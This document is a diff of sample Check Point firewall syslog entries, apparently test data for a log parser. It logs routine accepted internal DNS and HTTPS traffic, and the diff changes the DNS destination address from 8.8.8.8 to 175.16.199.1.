@@ -1401,16 +1401,16 @@ <134>1 2020-03-29T16:51:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500700"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56320"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:51:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500700"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40593"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:51:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21c,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500700"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56113"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:41Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500701"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33196"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:42Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21e,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500702"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52255"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:42Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21e,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500702"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37963"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:41Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500701"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33196"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:42Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21e,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500702"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52255"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:42Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21e,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500702"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37963"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:51:46Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d222,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48707"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:46Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d222,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45589"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:46Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d222,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57374"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:46Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d222,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45589"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:46Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d222,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57374"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:51:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d223,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33020"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:51:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d223,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36430"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:48Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d224,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500708"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39151"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d224,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500708"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56270"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:48Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d224,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500708"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39151"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d224,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500708"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56270"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:51:51Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d227,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500711"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48406"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:51:51Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d227,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500711"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41335"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:51:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d228,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50038"; service:"443"; service_id:"https"; src:"192.168.1.117"] 
@@ -1418,30 +1418,30 @@ <134>1 2020-03-29T16:51:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d228,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50040"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T16:51:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d229,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500713"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43882"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:51:54Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d229,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500713"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45089"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:54Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22a,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500714"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56267"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22b,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500715"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40923"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22b,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500715"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60127"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22b,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500715"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35657"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22b,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
